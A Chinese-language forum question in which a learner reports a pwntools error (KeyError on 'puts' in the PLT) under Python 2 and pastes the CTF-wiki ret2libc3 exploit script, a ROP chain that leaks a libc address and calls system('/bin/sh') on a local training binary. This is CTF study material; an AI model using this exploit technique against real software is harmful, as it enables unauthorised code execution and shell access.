有师傅用Python2跑过CTFwiki里的ret2libc3例程吗,我这边pwnlib一直报错,找了很久也没找到什么原因
附个链接:https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3
[+] Starting local process './ret2libc3': pid 132
[!] Could not populate PLT: invalid syntax (unicorn.py, line 110)
[*] '/mnt/c/Users/asuka/Desktop/CTF/wiki/pwn/ret2libc3/ret2libc3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Traceback (most recent call last):
File "2.py", line 8, in <module>
puts_plt = ret2libc3.plt['puts']
File "/home/asuka/.local/lib/python2.7/site-packages/pwnlib/elf/elf.py", line 163, in __missing__
return self[name]
File "/home/asuka/.local/lib/python2.7/site-packages/pwnlib/elf/elf.py", line 164, in __missing__
raise KeyError(name)
KeyError: u'puts'
[*] Stopped process './ret2libc3' (pid 132)
wiki给出的EXP如下
#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')
ret2libc3 = ELF('./ret2libc3')
puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']
print ("leak libc_start_main_got addr and return to main again")
payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])
sh.sendlineafter('Can you find it !?', payload)
print ("get the related addr")
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print ("get shell")
payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])
sh.sendline(payload)
sh.interactive()
